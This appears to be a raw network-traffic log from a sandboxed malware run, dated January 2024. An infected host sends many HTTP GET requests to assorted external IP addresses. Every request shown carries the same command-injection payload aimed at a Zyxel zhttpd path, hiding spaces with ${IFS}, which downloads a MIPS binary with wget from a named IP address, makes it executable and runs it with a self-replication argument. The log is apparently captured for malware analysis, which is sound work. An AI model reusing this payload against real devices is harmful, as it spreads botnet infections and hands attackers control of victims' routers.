                                                        Jan 28, 2024 10:12:59.538193941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6155192.168.2.1437256203.120.182.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538223028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6156192.168.2.1435198162.61.203.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538249016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6157192.168.2.1442922108.67.157.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538295984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6158192.168.2.1433464110.89.174.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538331032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6159192.168.2.1452846217.78.0.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538379908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6160192.168.2.1446034165.236.229.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538415909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6161192.168.2.145685879.61.113.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538455009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6162192.168.2.1449430194.179.88.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538501024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6163192.168.2.1456764103.143.113.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538528919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6164192.168.2.14360005.192.27.53443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538573027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6165192.168.2.1452394213.167.255.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538599014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6166192.168.2.1433840132.59.110.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538661957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6167192.168.2.1438320166.230.52.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538682938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6168192.168.2.143484071.141.42.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538728952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6169192.168.2.1457322126.228.14.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538786888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6170192.168.2.1443982204.62.224.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538817883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6171192.168.2.143583425.181.81.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538871050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6172192.168.2.1437016196.110.160.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538897038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6173192.168.2.1435950123.207.6.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538942099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6174192.168.2.145787671.100.108.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.538990021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6175192.168.2.1453080130.240.66.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539026976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6176192.168.2.1447532164.73.190.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539045095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6177192.168.2.1450204221.172.63.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539069891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6178192.168.2.145984081.79.134.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539119005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6179192.168.2.144070264.35.207.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539161921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6180192.168.2.145843474.176.63.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539195061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6181192.168.2.144092463.200.195.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539216042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6182192.168.2.1435746118.131.143.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539283037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6183192.168.2.144317691.0.16.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539310932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6184192.168.2.144388864.247.211.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539365053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6185192.168.2.14518561.254.186.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539405107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6186192.168.2.145643691.68.64.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539455891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6187192.168.2.1447296100.210.37.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539500952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6188192.168.2.144851040.67.98.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539522886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6189192.168.2.1459092189.188.45.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539556980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6190192.168.2.145107848.154.75.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539596081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6191192.168.2.1448434210.87.124.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539635897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6192192.168.2.1435436179.162.178.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539665937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6193192.168.2.143881413.238.250.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539699078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6194192.168.2.14339724.10.84.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539750099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6195192.168.2.1432968209.117.30.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539777040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6196192.168.2.143976258.34.67.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539825916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6197192.168.2.1444970105.171.170.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539865017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6198192.168.2.1450972193.152.140.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539905071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6199192.168.2.1433004185.141.46.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539937019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6200192.168.2.143707654.142.175.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.539973974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6201192.168.2.1454722220.253.244.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540007114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6202192.168.2.1459816108.178.89.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540061951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6203192.168.2.1444060212.162.156.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540091038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6204192.168.2.1449036160.182.132.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540146112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6205192.168.2.145995678.175.198.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540169001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6206192.168.2.1442424198.195.18.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540219069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6207192.168.2.143350091.119.60.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540246964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6208192.168.2.1442430111.225.124.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540302038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6209192.168.2.1453160118.237.94.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540322065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6210192.168.2.14358364.81.44.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540355921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6211192.168.2.144333270.25.143.49443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540401936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6212192.168.2.145242853.154.243.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540433884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6213192.168.2.1460782223.197.41.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540467024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6214192.168.2.1450922210.33.240.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:59.540479898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6215192.168.2.1440110112.157.211.210443
                                                        TimestampBytes transferredDirectionData
